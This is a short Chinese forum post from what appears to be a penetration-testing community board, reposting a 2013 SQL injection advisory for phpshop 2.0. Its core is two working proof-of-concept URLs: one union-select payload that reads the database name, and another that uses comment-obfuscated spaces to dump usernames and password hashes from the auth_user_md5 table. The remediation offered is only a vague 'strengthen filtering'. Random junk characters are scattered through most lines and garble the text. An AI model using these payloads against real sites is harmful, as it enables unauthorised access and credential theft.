中国网络渗透测试联盟

标题: phpshop 2.0 SQL注入及修复 [打印本页]
作者: admin    时间: 2013-1-18 18:24
标题: phpshop 2.0 SQL注入及修复
标题 : phpshop 2.0 SQL Injection Vulnerability
+ h8 n- K) C' F/ n8 ]7 D( q+ ]5 L& ]: h' [- m' ?& p  z
作者 : By onestree6 R2 x# K; @# k# Z" k
下载地址 : http://code.google.com/p/phpshop/downloads/list8 ~( v# r6 n9 I0 o1 j  `: l
测试地址: windows 7 / ubuntu# I* p0 g- o/ X& l6 l9 n
1 c- }* c, g0 V' a4 |" B

3 `9 u) e2 A0 q- R! y/ ]% aSQLi p0c:
/ c& }& Q! V3 e8 E, N , F( k) @. N; l' U# D+ p
==================
! B0 {) M7 a, T; J9 R
/ Y/ l# Y# H' e7 f3 u% q! u5 U( xhttp://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'+ Z* X; g, s/ N- E, O0 _8 i
union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --
/ x, ?2 }0 T% }; f" c5 m& A" ~) i
! e5 T, ~: q  g# ^http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--- Y' Q: j7 p* n3 Z

0 }  t( a: `& T& {( }修复:
9 B. O) c) L" v- B7 g加强过滤
* G$ h. c# o3 N
9 [  R0 f3 K! K2 D# @4 \8 R
6 W# X" d1 k3 T% l  E0 b



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2